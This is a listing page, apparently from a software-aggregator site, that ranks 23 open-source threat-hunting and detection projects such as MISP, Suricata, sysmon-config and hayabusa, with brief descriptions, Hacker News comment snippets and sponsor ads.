InfluxDB Platform is powered by columnar analytics, optimized for cost-efficient storage, and built with open data standards. Learn more β
Top 23 threat-hunting Open-Source Projects
-
Project mention: A recent abrupt change in Internet SSH brute force attacks against us | news.ycombinator.com | 2024-02-24
-
Scout Monitoring
Free Django app performance insights with Scout Monitoring. Get Scout setup in minutes, and let us sweat the small stuff. A couple lines in settings.py is all you need to start monitoring your apps. Sign up for our free tier today.
-
dnstwist
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
-
cd c:\sysmon git clone https://github.com/SwiftOnSecurity/sysmon-config sysmon -accepteula -i sysmon-config/sysmon-config.xml
-
Suricata
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
-
ThreatHunter-Playbook
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
-
-
-
InfluxDB
Purpose built for real-time analytics at any scale. InfluxDB Platform is powered by columnar analytics, optimized for cost-efficient storage, and built with open data standards.
-
awesome-threat-detection
β¨ A curated list of awesome threat detection and hunting resources π΅οΈββοΈ
-
-
securityonion
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, detections, and case management. It also includes other tools such as osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.
-
malwoverview
Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, Malware Bazaar, ThreatFox, Triage, InQuest and it is able to scan Android devices against VT.
-
Project mention: Angle-grinder: Slice and dice logs on the command line | news.ycombinator.com | 2024-04-29
Thereβs already a DFIR log tool named chainsaw: https://github.com/WithSecureLabs/chainsaw
-
-
Project mention: Xzbot: Notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094) | news.ycombinator.com | 2024-04-01
> It doesn't matter.
To understand the exact behavior and extend of the backdoor, this does matter. An end to end proof of how it works is exactly what was needed.
> A way to check if servers are vulnerable is probably by querying the package manager
Yes, this has been know since the initial report + later discovering what exact strings are present for the payload.
https://github.com/Neo23x0/signature-base/blob/master/yara/b...
> Not very sophisticated, but it'll work.
Unfortunately, we live in a world with closed-servers and appliances - being able as a customer or pen tester rule out certain class of security issues without having the source/insights available is usually desirable.
-
-
hayabusa
Hayabusa (ιΌ) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24 -
-
-
-
matano
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
sorry thats https://matano.dev
-
beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
-
-
APT-Hunter
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
threat-hunting discussion
threat-hunting related posts
-
MISP galaxy β cybersecurity and other related knowledge base
-
Software Hardening Tools for System Defense
-
Teler: Real-Time HTTP Intrusion Detection
-
A recent abrupt change in Internet SSH brute force attacks against us
-
Crawlector Version 2.0 has been released. This is a milestone release.
-
Free Tech Tools and Resources - Terraform for AWS, Cyberthreat Tool, Vim Training & More
-
Troubleshooting Intermittent Slowness on Network Share
-
A note from our sponsor - InfluxDB
www.influxdata.com | 18 Sep 2024
Index
What are some of the best open-source threat-hunting projects? This list will help you:
Project | Stars | |
---|---|---|
1 | MISP | 5,253 |
2 | dnstwist | 4,813 |
3 | sysmon-config | 4,736 |
4 | Suricata | 4,457 |
5 | ThreatHunter-Playbook | 3,967 |
6 | IntelOwl | 3,750 |
7 | HELK | 3,742 |
8 | awesome-threat-detection | 3,590 |
9 | awesome-yara | 3,472 |
10 | securityonion | 3,146 |
11 | malwoverview | 2,916 |
12 | chainsaw | 2,713 |
13 | sysmon-modular | 2,619 |
14 | signature-base | 2,442 |
15 | APT_REPORT | 2,359 |
16 | hayabusa | 2,177 |
17 | EVTX-ATTACK-SAMPLES | 2,171 |
18 | yeti | 1,709 |
19 | SysmonTools | 1,478 |
20 | matano | 1,443 |
21 | beagle | 1,269 |
22 | YaraHunter | 1,234 |
23 | APT-Hunter | 1,228 |